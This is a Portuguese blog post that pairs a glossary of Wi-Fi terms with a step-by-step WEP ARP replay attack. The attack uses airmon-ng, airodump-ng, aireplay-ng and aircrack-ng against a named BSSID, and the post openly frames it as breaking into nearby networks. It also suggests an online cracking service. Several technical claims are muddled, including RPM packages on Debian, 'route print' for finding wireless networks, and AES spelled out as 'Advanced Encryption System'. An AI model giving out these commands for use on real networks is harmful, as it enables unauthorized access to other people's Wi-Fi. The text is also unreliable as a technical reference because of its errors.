Técnicas de Segurança em Redes Wireless
"Como invadir rede sem-fio baseadas em criptografia WEP"
Alguns conceitos e definições:
Ponto de acesso (PA) – Receptor Wi-Fi que se comunica com adaptadores Wi-Fi e dá acesso à internet. Em casa, é preciso ligar a conexão em alta velocidade ao ponto de acesso para usar uma rede sem fio. Access point (AP), em inglês.
SSID – Acrônimo de Service Set Identifier. Identifica os pontos de acesso em uma rede Wi-Fi e diferencia uma rede wireless de outra.
BSSID – Acrônimo de Basic Service Set Identifier ou Identificador exclusivo de cada cliente sem fio numa rede sem fio. O BSSID é o endereço MAC Ethernet de cada adaptador da rede.
802.11a – Variante Wi-Fi que opera na freqüência de 5 GHz e atinge velocidade de 54 Mbps (megabits por segundo). É incompatível com as redes 802.11b.
802.11b – Padrão original de redes sem fio definido pelo IEEE. É o mais lento de todos, com transmissão de 11 megabits por
segundo. Adaptadores compatíveis com 802.11b dão acesso a hotspots públicos.
802.11g – Padrão Wi-Fi com velocidade similar ao 802.11a (54 Mbps). É compatível com redes 802.11b.
802.11i – Atualização de segurança do padrão 802.11. Conta com o novo protocolo AES (Advanced Encryption System), que oferece maior proteção que o WPA.
802.11n – Grupo do comitê IEEE 802.11 que trabalha na definição de um padrão com taxa de transferência em redes sem fio de pelo menos 100 Mbps, mas com o objetivo de atingir até 540 Mpbs. O plano do grupo é ratificar o padrão em 2007.
802.16 – (WiMax) Protocolo para redes sem fio 802.16 que vai conectar, em uma primeira fase, áreas metropolitanas com alcance de até 50 quilômetros.
Criptografia – A arte de “escrever” em códigos. Utilizada na informática para garantir o sigilo das comunicações de dados.
Wi-Fi – Abreviação para “wireless fidelity”, que denota qualquer tipo de rede sem fios que utilize tecnologia 802.11.
WEP – Sigla de Wired Equivalency Privacy, protocolo de segurança que criptografa os dados enviados e recebidos em uma conexão sem fios. Não é muito seguro e tem como alternativa o WPA.
WPA – Acrônimo de Wi-Fi Protected Access. É um protocolo de segurança com recursos adicionais de criptografia de informações e autenticação de usuários para redes sem fio. É mais seguro que o WEP.
Demonstração prática do ARP Replay Attack contra redes sem fio que utilizam criptografia WEP.
A distribuição que será utilizada para a demonstração é o Debian, onde poderá ser feita em qualquer distribuição tendo os pacotes RPM instalado.
Os pacotes serão esses:
$ sudo apt-get install kismet
Instalar o driver nativo da sua placa de rede e garantir que o “modo monitor” possa ser habilitado.
$ sudo airmon-ng start wlan0
$ sudo airodump-ng -c 1 --bssid
08:10:74:3E:94:04 -w dumpfile mon0
$ sudo aireplay-ng -1 5 -a
08:10:74:3E:94:04 mon0
$ sudo aireplay-ng -3 -b
08:10:74:3E:94:04 mon0
$ sudo aircrack-ng dumpfile-01.cap
Após instalar o driver, é só "snnifar" a rede para saber quais conexões estão dentro de uma área de 50m, para poder realizar a invasão. Podendo utilizar o comando route print, para realização do mapa de roteamento das redes que estão conectadas e nas mesmas que estão na distância de 50m.
Podendo utilizar o site https://www.cloudcracker.com/ para poder descriptografar as senhas a partir do SSID da rede.
Texto de Allan Garcia
Editado por Bergh Nunes
Nenhum comentário:
Postar um comentário